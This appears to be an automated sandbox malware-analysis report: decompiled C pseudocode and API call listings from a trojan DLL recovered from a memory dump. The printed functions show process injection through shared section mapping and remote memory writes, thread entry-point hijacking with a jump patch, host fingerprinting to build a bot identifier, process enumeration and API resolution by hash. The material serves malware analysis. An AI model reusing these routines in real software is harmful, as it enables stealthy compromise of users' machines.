    				_v120.cbWndExtra = 0;
    				_v120.lpszMenuName = 0;
    				_v120.cbClsExtra = 0;
    				_v120.hInstance = 0;
    				if(RegisterClassExA( &_v120) != 0) {
    					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
    					if(_t106 != 0) {
    						DestroyWindow(_t106);
    						UnregisterClassA( &_v56, 0);
    					}
    				}
    				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
    					_t126 = _v20;
    					goto L12;
    				} else {
    					_t126 = _v20;
    					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
    						goto L12;
    					}
    					_t140 = E1000864F( *0x1001e688, 0x1ac4);
    					_v32 = _t140;
    					if(_t140 == 0) {
    						goto L12;
    					}
    					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
    					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
    					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
    					E10008600( &_v32, 0x1ac4);
    					_t141 =  *0x1001e688; // 0x87804a0
    					 *0x1001e688 = _t131;
    					E100086C7(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
    					E1000C64A(_v12, _v8, _v36);
    					 *0x1001e688 = _t141;
    					goto L14;
    				}
    			}

    APIs
    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CD4), ref: 1000C73E
    • RegisterClassExA.USER32(00000030), ref: 1000C790
    • CreateWindowExA.USER32 ref: 1000C7BB
    • DestroyWindow.USER32(00000000), ref: 1000C7C6
    • UnregisterClassA.USER32 ref: 1000C7D1
    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7ED
    • NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7F7
    • NtMapViewOfSection.NTDLL(?,1000CBAB,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C81E
    • VirtualAllocEx.KERNELBASE(1000CBAB,00000000,00001AC4,00001000,00000004), ref: 1000C861
    • WriteProcessMemory.KERNELBASE(1000CBAB,00000000,00000000,00001AC4,?), ref: 1000C87A
      • Part of subcall function 10008600: HeapFree.KERNEL32(00000000,00000000,00000001,000000FF,10006020), ref: 10008646
    • GetCurrentProcess.KERNEL32(00000000), ref: 1000C8E6
    • NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8ED
    • NtClose.NTDLL(00000000), ref: 1000C900
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
    • String ID: 0$cdcdwqwqwq$sadccdcdsasa
    • API String ID: 2002808388-2319545179
    • Opcode ID: c33398d2d2482e1b44f2caf9b771938d6ed7ceb522d5affd1a3126bfae9fd242
    • Instruction ID: d4ed6399113d3519698ced96f191084217c42ad0747b1462dfeddcfc8903a4cc
    • Opcode Fuzzy Hash: c33398d2d2482e1b44f2caf9b771938d6ed7ceb522d5affd1a3126bfae9fd242
    • Instruction Fuzzy Hash: 49713971900259AFEB11CF95CC88EAFBBB9FF49740F214469F605A7290D770AE04CB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E1000CB82(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
    				long _v8;
    				long _v12;
    				void* _v16;
    				intOrPtr _v23;
    				void _v24;
    				long _v28;
    				struct _CONTEXT _v744;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				struct HINSTANCE__* _t32;
    				intOrPtr _t33;
    				intOrPtr _t35;
    				void* _t39;
    				void* _t63;
    				long _t65;
    				void* _t70;
    				void** _t73;
    				void* _t74;
    
    				_t73 = __edx;
    				_t63 = __ecx;
    				_t74 = 0;
    				if(E1000C4D9(__ecx, __edx, __edx, 0) != 0) {
    					_t39 = E1000C6CB( *((intOrPtr*)(__edx)), _a4); // executed
    					_t74 = _t39;
    					if(_t74 != 0) {
    						memset( &_v744, 0, 0x2cc);
    						_v744.ContextFlags = 0x10002;
    						if(GetThreadContext(_t73[1],  &_v744) != 0) {
    							_t70 = _v744.Eax;
    							_v12 = _v12 & 0x00000000;
    							_v24 = 0xe9;
    							_t65 = 5;
    							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
    							_v8 = _t65;
    							_v16 = _t70;
    							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v744.Eax,  &_v24, _t65,  &_v8) < 0) {
    								L6:
    								_t74 = 0;
    							} else {
    								_v28 = _v28 & 0x00000000;
    								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
    									goto L6;
    								}
    							}
    						}
    					}
    				}
    				_t32 =  *0x1001e77c; // 0x0
    				if(_t32 != 0) {
    					FreeLibrary(_t32);
    					 *0x1001e77c =  *0x1001e77c & 0x00000000;
    				}
    				_t33 =  *0x1001e784; // 0x0
    				if(_t33 != 0) {
    					_t35 =  *0x1001e684; // 0x87ff878
    					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
    					E10008600(0x1001e784, 0xfffffffe);
    				}
    				return _t74;
    			}

    APIs
      • Part of subcall function 1000C4D9: LoadLibraryW.KERNEL32 ref: 1000C5D1
      • Part of subcall function 1000C4D9: memset.MSVCRT ref: 1000C610
    • FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC7E
      • Part of subcall function 1000C6CB: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CD4), ref: 1000C73E
      • Part of subcall function 1000C6CB: RegisterClassExA.USER32(00000030), ref: 1000C790
      • Part of subcall function 1000C6CB: CreateWindowExA.USER32 ref: 1000C7BB
      • Part of subcall function 1000C6CB: DestroyWindow.USER32(00000000), ref: 1000C7C6
      • Part of subcall function 1000C6CB: UnregisterClassA.USER32 ref: 1000C7D1
    • memset.MSVCRT ref: 1000CBC3
    • GetThreadContext.KERNELBASE(?,00010002,?,00000000,00000000), ref: 1000CBE4
    • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC2D
    • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC4A
    • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC6B
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$ContextDestroyFreeLoadRegisterSectionThreadUnregisterWrite
    • String ID:
    • API String ID: 850789531-0
    • Opcode ID: 81e1878cde3c01e1741f75c6aa3df445a148ed532b2f4d400af4b30928b6dc9e
    • Instruction ID: 8dc3fb5d1cfe451f8c4839fb180d38a9adec49fd8f8a3984ebf3c7f861d3db7f
    • Opcode Fuzzy Hash: 81e1878cde3c01e1741f75c6aa3df445a148ed532b2f4d400af4b30928b6dc9e
    • Instruction Fuzzy Hash: EA311A72A04219AFFB01DFA4CD89F9EB7B8EF08390F114265E505E61A4D731DE448F90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E1000D02A(void* __fp0) {
    				long _v8;
    				long _v12;
    				union _SID_NAME_USE _v16;
    				struct _SYSTEM_INFO _v52;
    				char _v180;
    				short _v692;
    				char _v704;
    				char _v2680;
    				void* __esi;
    				struct _OSVERSIONINFOA* _t81;
    				intOrPtr _t83;
    				void* _t84;
    				long _t86;
    				void** _t88;
    				intOrPtr _t90;
    				intOrPtr _t91;
    				intOrPtr _t92;
    				int _t98;
    				intOrPtr _t103;
    				char* _t105;
    				void* _t108;
    				intOrPtr _t111;
    				long _t115;
    				signed int _t117;
    				long _t119;
    				intOrPtr _t124;
    				intOrPtr _t127;
    				intOrPtr _t130;
    				intOrPtr _t134;
    				intOrPtr _t145;
    				intOrPtr _t147;
    				intOrPtr _t149;
    				intOrPtr _t152;
    				intOrPtr _t154;
    				signed int _t159;
    				struct HINSTANCE__* _t162;
    				short* _t164;
    				intOrPtr _t167;
    				WCHAR* _t168;
    				char* _t169;
    				intOrPtr _t181;
    				intOrPtr _t200;
    				void* _t215;
    				long _t218;
    				void* _t219;
    				char* _t220;
    				struct _OSVERSIONINFOA* _t222;
    				void* _t223;
    				int* _t224;
    				void* _t241;
    
    				_t241 = __fp0;
    				_t162 =  *0x1001e69c; // 0x10000000
    				_t81 = E100085EA(0x1ac4);
    				_t222 = _t81;
    				if(_t222 == 0) {
    					return _t81;
    				}
    				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
    				_t83 =  *0x1001e684; // 0x87ff878
    				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
    				_t3 = _t222 + 0x648; // 0x648
    				E1001230C( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
    				_t5 = _t222 + 0x1644; // 0x1644
    				_t216 = _t5;
    				_t86 = GetModuleFileNameW(0, _t5, 0x105);
    				_t227 = _t86;
    				if(_t86 != 0) {
    					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FA4(_t216, _t227);
    				}
    				GetCurrentProcess();
    				_t88 = E1000B9EB(); // executed
    				 *(_t222 + 0x110) = _t88;
    				_t178 =  *_t88;
    				if(E1000BB73( *_t88) == 0) {
    					_t90 = E1000BA48(_t178, _t222); // executed
    					__eflags = _t90;
    					_t181 = (0 | _t90 > 0x00000000) + 1;
    					__eflags = _t181;
    					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
    				} else {
    					 *((intOrPtr*)(_t222 + 0x214)) = 3;
    				}
    				_t12 = _t222 + 0x220; // 0x220, executed
    				_t91 = E1000E3FC(_t12); // executed
    				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
    				_t92 = E1000E3C1(_t12); // executed
    				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
    				 *(_t222 + 0x224) = _t162;
    				_v12 = 0x80;
    				_v8 = 0x100;
    				_t22 = _t222 + 0x114; // 0x114
    				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
    					GetLastError();
    				}
    				_t98 = GetSystemMetrics(0x1000);
    				_t26 = _t222 + 0x228; // 0x228
    				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
    				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
    				GetLastError();
    				_t31 = _t222 + 0x228; // 0x228
    				 *((intOrPtr*)(_t222 + 0x434)) = E10008FA4(_t31, _t98);
    				_t34 = _t222 + 0x114; // 0x114, executed
    				_t103 = E1000B78E(_t34,  &_v692);
    				_t35 = _t222 + 0xb0; // 0xb0
    				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
    				_push(_t35);
    				E1000B663(_t103, _t35, _t98, _t241);
    				_t37 = _t222 + 0xb0; // 0xb0
    				_t105 = _t37;
    				_t38 = _t222 + 0xd0; // 0xd0
    				_t164 = _t38;
    				if(_t105 != 0) {
    					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
    					if(_t159 > 0) {
    						_t164[_t159] = 0;
    					}
    				}
    				_t41 = _t222 + 0x438; // 0x438
    				_t42 = _t222 + 0x228; // 0x228
    				E10008FBE(_t42, _t41);
    				_t43 = _t222 + 0xb0; // 0xb0
    				_t108 = E1000D40B(_t43, E1000C384(_t43), 0);
    				_t44 = _t222 + 0x100c; // 0x100c
    				E1000B870(_t108, _t44, _t241);
    				_t199 = GetCurrentProcess(); // executed
    				_t111 = E1000BBC5(_t110); // executed
    				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
    				memset(_t222, 0, 0x9c);
    				_t224 = _t223 + 0xc;
    				_t222->dwOSVersionInfoSize = 0x9c;
    				GetVersionExA(_t222);
    				_t167 =  *0x1001e684; // 0x87ff878
    				_t115 = 0;
    				_v8 = 0;
    				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
    					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
    					_t115 = _v8;
    				}
    				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
    				if(_t115 == 0) {
    					GetSystemInfo( &_v52);
    					_t117 = _v52.dwOemId & 0x0000ffff;
    				} else {
    					_t117 = 9;
    				}
    				_t54 = _t222 + 0x1020; // 0x1020
    				_t168 = _t54;
    				 *(_t222 + 0x9c) = _t117;
    				GetWindowsDirectoryW(_t168, 0x104);
    				_t119 = E100095C7(_t199, 0x10c);
    				_t200 =  *0x1001e684; // 0x87ff878
    				_t218 = _t119;
    				 *_t224 = 0x104;
    				_push( &_v704);
    				_push(_t218);
    				_v8 = _t218;
    				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
    					_t154 =  *0x1001e684; // 0x87ff878
    					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
    				}
    				E100085BB( &_v8);
    				_t124 =  *0x1001e684; // 0x87ff878
    				_t61 = _t222 + 0x1434; // 0x1434
    				_t219 = _t61;
    				 *_t224 = 0x209;
    				_push(_t219);
    				_push(L"USERPROFILE");
    				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
    					E10009626(_t219, 0x105, L"%s\\%s", _t168);
    					_t152 =  *0x1001e684; // 0x87ff878
    					_t224 =  &(_t224[5]);
    					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
    				}
    				_push(0x20a);
    				_t64 = _t222 + 0x122a; // 0x122a
    				_t169 = L"TEMP";
    				_t127 =  *0x1001e684; // 0x87ff878
    				_push(_t169);
    				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
    					_t149 =  *0x1001e684; // 0x87ff878
    					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
    				}
    				_push(0x40);
    				_t220 = L"SystemDrive";
    				_push( &_v180);
    				_t130 =  *0x1001e684; // 0x87ff878
    				_push(_t220);
    				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
    					_t147 =  *0x1001e684; // 0x87ff878
    					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
    				}
    				_v8 = 0x7f;
    				_t72 = _t222 + 0x199c; // 0x199c
    				_t134 =  *0x1001e684; // 0x87ff878
    				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
    				_t75 = _t222 + 0x100c; // 0x100c
    				E1001230C(E1000D40B(_t75, E1000C384(_t75), 0),  &_v2680);
    				_t76 = _t222 + 0x1858; // 0x1858
    				E100122DE( &_v2680, _t76, 0x20);
    				_t79 = _t222 + 0x1878; // 0x1878
    				E10009013(1, _t79, 0x14, 0x1e,  &_v2680);
    				_t145 = E1000CD3E(_t79); // executed
    				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
    				return _t222;
    			}

    APIs
      • Part of subcall function 100085EA: RtlAllocateHeap.NTDLL(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8
    • GetCurrentProcessId.KERNEL32 ref: 1000D051
    • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D08D
    • GetCurrentProcess.KERNEL32 ref: 1000D0AA
    • LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D13C
    • GetLastError.KERNEL32 ref: 1000D149
    • GetSystemMetrics.USER32(00001000), ref: 1000D155
    • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D177
    • GetLastError.KERNEL32 ref: 1000D17D
    • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1D2
    • GetCurrentProcess.KERNEL32 ref: 1000D219
      • Part of subcall function 1000BA48: FindCloseChangeNotification.KERNELBASE(?,00000000,73BCF500,10000000), ref: 1000BAEC
    • memset.MSVCRT ref: 1000D234
    • GetVersionExA.KERNEL32(00000000), ref: 1000D23F
    • GetCurrentProcess.KERNEL32(00000100), ref: 1000D259
    • GetSystemInfo.KERNEL32(?), ref: 1000D275
    • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D292
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: CurrentProcess$ErrorFileLastModuleNameSystem$AccountAllocateByteChangeCharCloseDirectoryFindHeapInfoLookupMetricsMultiNotificationVersionWideWindowsmemset
    • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
    • API String ID: 3085892711-2706916422
    • Opcode ID: c2d3c725b07398553a8c383ccebc211cfb4a2dc76306630acd40452e3f2717f5
    • Instruction ID: 5888c9f6af661bcb9cc61cc2503a615177fd6cb5ab4d5a94d274bd65592933d8
    • Opcode Fuzzy Hash: c2d3c725b07398553a8c383ccebc211cfb4a2dc76306630acd40452e3f2717f5
    • Instruction Fuzzy Hash: 7DB15A75600709AFE714EB74CC89FEA77E8EF18380F01482EF55AD7195EB70AA448B21
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
    				long _v8;
    				char _v16;
    				short _v144;
    				short _v664;
    				void* _t20;
    				struct HINSTANCE__* _t23;
    				long _t24;
    				long _t25;
    				char* _t29;
    				WCHAR* _t34;
    				long _t35;
    				void* _t40;
    				void* _t52;
    				struct _SECURITY_ATTRIBUTES* _t56;
    				void* _t57;
    				intOrPtr* _t58;
    				void* _t60;
    
    				_t52 = __edx;
    				if(_a8 != 1) {
    					if(_a8 == 0) {
    						TerminateThread( *0x1001e6a8, 0);
    					}
    					L15:
    					return 1;
    				}
    				E100085D5();
    				_t20 = E100097F2( &_v16);
    				_t60 = _t52;
    				if(_t60 < 0 || _t60 <= 0 && _t20 < 0x2e830) {
    					goto L15;
    				} else {
    					E10008F5E();
    					GetModuleHandleA(0);
    					_t23 = _a4;
    					 *0x1001e69c = _t23;
    					_t24 = GetModuleFileNameW(_t23,  &_v664, 0x104);
    					_t25 = GetLastError();
    					if(_t24 == 0 || _t25 == 0x7a) {
    						L10:
    						return 0;
    					} else {
    						memset( &_v144, 0, 0x80);
    						_t58 = _t57 + 0xc;
    						_t56 = 0;
    						do {
    							_t29 = E100095AD(_t56);
    							_a8 = _t29;
    							MultiByteToWideChar(0, 0, _t29, 0xffffffff,  &_v144, 0x3f);
    							E100085A8( &_a8);
    							_t56 =  &(_t56->nLength);
    						} while (_t56 < 0x2710);
    						E10012A66( *0x1001e69c);
    						 *_t58 = 0x7c3;
    						 *0x1001e684 = E1000E1C7(0x1001ba20, 0x11c);
    						 *_t58 = 0xb4e;
    						_t34 = E100095C7(0x1001ba20);
    						_a8 = _t34;
    						_t35 = GetFileAttributesW(_t34); // executed
    						_push( &_a8);
    						if(_t35 == 0xffffffff) {
    							E100085BB();
    							_v8 = 0;
    							_t40 = CreateThread(0, 0, E10005DEE, 0, 0,  &_v8);
    							 *0x1001e6a8 = _t40;
    							if(_t40 != 0) {
    								goto L15;
    							}
    							goto L10;
    						}
    						E100085BB();
    						goto L10;
    					}
    				}
    			}

    APIs
    • TerminateThread.KERNELBASE(00000000), ref: 100060B6
      • Part of subcall function 100085D5: HeapCreate.KERNELBASE(00000000,00080000,00000000,10005F84), ref: 100085DE
      • Part of subcall function 100097F2: GetSystemTimeAsFileTime.KERNEL32(?,?,10005F8C), ref: 100097FF
    • GetModuleHandleA.KERNEL32(00000000), ref: 10005FA9
    • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FC4
    • GetLastError.KERNEL32 ref: 10005FCC
    • memset.MSVCRT ref: 10005FF0
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006012
    • GetFileAttributesW.KERNELBASE(00000000), ref: 10006060
    • CreateThread.KERNELBASE(00000000,00000000,10005DEE,00000000,00000000,?), ref: 10006094
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: File$CreateModuleThreadTime$AttributesByteCharErrorHandleHeapLastMultiNameSystemTerminateWidememset
    • String ID:
    • API String ID: 1832041143-0
    • Opcode ID: 7e808ea799e680f3c2fd863b6732618b7865da000cb2eca94c581aef9a0140a7
    • Instruction ID: a20790f259ae4b3f06c91942fa7be99be5cb131edc2f008d1ecb11abc9cb9497
    • Opcode Fuzzy Hash: 7e808ea799e680f3c2fd863b6732618b7865da000cb2eca94c581aef9a0140a7
    • Instruction Fuzzy Hash: 2631C275840154ABFB11DB20CC89EAE37B9EB487A0F20C529F859D6195EB34AB45CB22
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E1000B78E(WCHAR* __ecx, void* __edx) {
    				long _v8;
    				long _v12;
    				WCHAR* _v16;
    				short _v528;
    				short _v1040;
    				short _v1552;
    				intOrPtr _t23;
    				WCHAR* _t27;
    				signed int _t29;
    				void* _t33;
    				long _t38;
    				WCHAR* _t43;
    				WCHAR* _t56;
    
    				_t44 = __ecx;
    				_v8 = _v8 & 0x00000000;
    				_t43 = __edx;
    				_t56 = __ecx;
    				memset(__edx, 0, 0x100);
    				_v12 = 0x100;
    				_t23 =  *0x1001e684; // 0x87ff878
    				 *((intOrPtr*)(_t23 + 0xb0))( &_v528,  &_v12);
    				lstrcpynW(_t43,  &_v528, 0x100);
    				_t27 = E100095C7(_t44, 0xa88);
    				_v16 = _t27;
    				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
    				asm("sbb eax, eax");
    				_v8 = _v8 &  ~_t29;
    				E100085BB( &_v16);
    				_t33 = E1000C39D(_t43);
    				E10009626( &(_t43[E1000C39D(_t43)]), 0x100 - _t33, L"%u", _v8);
    				lstrcatW(_t43, _t56);
    				_t38 = E1000C39D(_t43);
    				_v12 = _t38;
    				CharUpperBuffW(_t43, _t38);
    				return E1000D40B(_t43, E1000C39D(_t43) + _t40, 0);
    			}

    APIs
    • memset.MSVCRT ref: 1000B7AB
    • lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7D5
    • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B807
      • Part of subcall function 10009626: _vsnwprintf.MSVCRT ref: 10009643
    • lstrcatW.KERNEL32(?,00000114), ref: 1000B840
    • CharUpperBuffW.USER32(?,00000000), ref: 1000B852
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
    • String ID:
    • API String ID: 455400327-0
    • Opcode ID: b942919f709bbc5ee76562d8b93a0ca6cadf47ed1a8cc120fd559aea66f26d5c
    • Instruction ID: 54ded0e5f58a315f66d10a54a7c6d114594958cb431f06a38f87ddf0e98dcf8a
    • Opcode Fuzzy Hash: b942919f709bbc5ee76562d8b93a0ca6cadf47ed1a8cc120fd559aea66f26d5c
    • Instruction Fuzzy Hash: 0F2153B6900218BFE714DBB4CC8AFEE77BCEB58250F108569F505D6185EA74AF448B60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E1000AB89(intOrPtr __ecx, void* __edx) {
    				void* _v304;
    				void* _v308;
    				signed int _t14;
    				signed int _t15;
    				void* _t22;
    				intOrPtr _t28;
    				void* _t31;
    				intOrPtr _t33;
    				void* _t40;
    				void* _t42;
    
    				_t33 = __ecx;
    				_t31 = __edx; // executed
    				_t14 = CreateToolhelp32Snapshot(2, 0);
    				_t42 = _t14;
    				_t15 = _t14 | 0xffffffff;
    				if(_t42 != _t15) {
    					memset( &_v304, 0, 0x128);
    					_v304 = 0x128;
    					if(Process32First(_t42,  &_v304) != 0) {
    						while(1) {
    							_t22 = E1000CCCB(_t33,  &_v308, _t31); // executed
    							_t40 = _t22;
    							if(_t40 == 0) {
    								break;
    							}
    							_t33 =  *0x1001e684; // 0x87ff878
    							if(Process32Next(_t42,  &_v308) != 0) {
    								continue;
    							}
    							break;
    						}
    						FindCloseChangeNotification(_t42);
    						_t15 = 0 | _t40 == 0x00000000;
    					} else {
    						_t28 =  *0x1001e684; // 0x87ff878
    						 *((intOrPtr*)(_t28 + 0x30))(_t42);
    						_t15 = 0xfffffffe;
    					}
    				}
    				return _t15;
    			}

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABA3
    • memset.MSVCRT ref: 1000ABBC
    • Process32First.KERNEL32(00000000,?), ref: 1000ABD3
    • Process32Next.KERNEL32(00000000,?), ref: 1000AC07
    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 1000AC14
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32memset
    • String ID:
    • API String ID: 2518216231-0
    • Opcode ID: b96f3aeff797ebc95a186c73b0c318709a57fc9dd53ef4a83a583534a18eeda1
    • Instruction ID: 12e21ce9a58b3ff76d4a50db47e98f108d0fce0e5cc8861effe551863d451460
    • Opcode Fuzzy Hash: b96f3aeff797ebc95a186c73b0c318709a57fc9dd53ef4a83a583534a18eeda1
    • Instruction Fuzzy Hash: 261194722047516BE310DBA8CC89E9F37DCEB863A0F560A29F514C7185EB30D8058762
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E1000DFB8(void* __ecx, intOrPtr __edx) {
    				signed int _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v92;
    				intOrPtr _t41;
    				signed int _t47;
    				signed int _t49;
    				signed int _t51;
    				void* _t56;
    				struct HINSTANCE__* _t58;
    				_Unknown_base(*)()* _t59;
    				intOrPtr _t60;
    				void* _t62;
    				intOrPtr _t63;
    				void* _t69;
    				char _t70;
    				void* _t75;
    				CHAR* _t80;
    				void* _t82;
    
    				_t75 = __ecx;
    				_v12 = __edx;
    				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
    				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
    				if(_t41 == 0) {
    					L4:
    					return 0;
    				}
    				_t62 = _t41 + __ecx;
    				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
    				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
    				_t63 =  *((intOrPtr*)(_t62 + 0x18));
    				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
    				_t47 = 0;
    				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
    				_v8 = 0;
    				_v16 = _t63;
    				if(_t63 == 0) {
    					goto L4;
    				} else {
    					goto L2;
    				}
    				while(1) {
    					L2:
    					_t49 = E1000D40B( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C384( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
    					_t51 = _v8;
    					if((_t49 ^ 0x218fe95b) == _v12) {
    						break;
    					}
    					_t73 = _v20;
    					_t47 = _t51 + 1;
    					_v8 = _t47;
    					if(_t47 < _v16) {
    						continue;
    					}
    					goto L4;
    				}
    				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
    				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
    				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
    					return _t80;
    				} else {
    					_t56 = 0;
    					while(1) {
    						_t70 = _t80[_t56];
    						if(_t70 == 0x2e || _t70 == 0) {
    							break;
    						}
    						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
    						_t56 = _t56 + 1;
    						if(_t56 < 0x40) {
    							continue;
    						}
    						break;
    					}
    					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
    					 *((char*)(_t82 + _t56 - 0x54)) = 0;
    					if( *((char*)(_t56 + _t80)) != 0) {
    						_t80 =  &(( &(_t80[1]))[_t56]);
    					}
    					_t40 =  &_v92; // 0x6c6c642e
    					_t58 = LoadLibraryA(_t40); // executed
    					if(_t58 == 0) {
    						goto L4;
    					}
    					_t59 = GetProcAddress(_t58, _t80);
    					if(_t59 == 0) {
    						goto L4;
    					}
    					return _t59;
    				}
    			}

    APIs
    • LoadLibraryA.KERNELBASE(.dll,1000604A,0000011C,00000000), ref: 1000E088
    • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E094
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
